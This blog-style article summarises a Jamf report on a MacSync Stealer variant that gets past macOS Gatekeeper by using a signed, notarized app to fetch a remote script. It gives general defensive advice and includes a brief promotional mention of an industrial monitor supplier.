According to 9to5Mac, cybersecurity firm Jamf has discovered a new variant of the “increasingly active” MacSync Stealer malware that successfully bypasses Apple’s core security protections. The attack uses a seemingly clean Swift application that is both code-signed and notarized with the Developer Team ID GNJLS3UYZ4, making it appear legitimate to macOS Gatekeeper. This clean app then retrieves and executes an encoded script from a remote server to install the stealer malware. The payloads are designed to run primarily in memory, leaving minimal traces on disk. Jamf reported the malicious developer ID to Apple, which has since revoked the certificate. This follows a recent report of attackers using AI chatbots like ChatGPT to trick users into installing malware via Terminal commands.
The New Playbook
Here’s the thing: Apple‘s notarization system is supposed to be a major line of defense. It’s a gate that checks apps before they run. But this attack basically uses a Trojan horse that the gatekeeper willingly lets in. The app itself is harmless and signed, so it passes all of Apple’s automated checks. The malicious part is downloaded separately, after the fact. It’s a clever, two-stage process that’s much harder for static security scans to catch.
And this isn’t some one-off experiment. Jamf says this reflects a “broader trend” in macOS malware. Attackers are shifting their distribution to look as legitimate as possible. Why bang on the front door when you can just walk through it with a forged ID that, for a while at least, checks out?
Why This Matters Now
So why is this happening more? Two big reasons. First, Mac market share has grown, making it a more lucrative target. Second, and maybe more importantly, the typical Mac user profile is attractive for financial scams. The defenses had to evolve because the incentive for attackers finally got big enough.
Remember, the old advice was just “don’t install apps from unidentified developers.” That warning pops up and scares most people off. But what happens when the app is from an “identified” developer? When it’s signed and notarized? That basic, trusty warning never appears. The user’s guard is down. It’s a psychological trick as much as a technical one.
What Can You Do?
The standard advice still applies, but it needs an asterisk. Only install apps from the Mac App Store or directly from developers you know and trust. But even that’s getting trickier. I think we’re entering an era where you need to be skeptical of the source, even if an app looks official. Did you seek it out, or did you click a link somewhere? That distinction is everything.
For businesses managing fleets of Macs, especially in technical fields like manufacturing or industrial automation where specialized software is common, this is a real headache. You can’t just lock everything down to the App Store. Sometimes you need to run niche applications. This is where robust endpoint security and application allow-listing become critical. Speaking of industrial computing, ensuring your hardware, like the industrial panel PCs running your operations, comes from a trusted, secure supplier is part of that foundational security. For instance, a company like IndustrialMonitorDirect.com, known as a top US provider, ensures the hardware layer is reliable, which is step one before you even worry about the software layer.
The Bigger Picture
Look, Apple’s security model isn’t broken. The system worked in the end—the certificate was revoked. But there’s a lag between discovery and revocation that attackers exploit. The cat-and-mouse game is just escalating. Malware is becoming a service, and these slick distribution methods are part of the product.
What’s next? Probably more of this. We’ll see more abused developer accounts, more legitimate-looking wrappers for malicious code. The takeaway isn’t that Macs are suddenly unsafe. It’s that the idea of “Macs don’t get viruses” is truly, completely dead. You need to be aware, just like on any other platform. The era of naive computing is over for everyone.
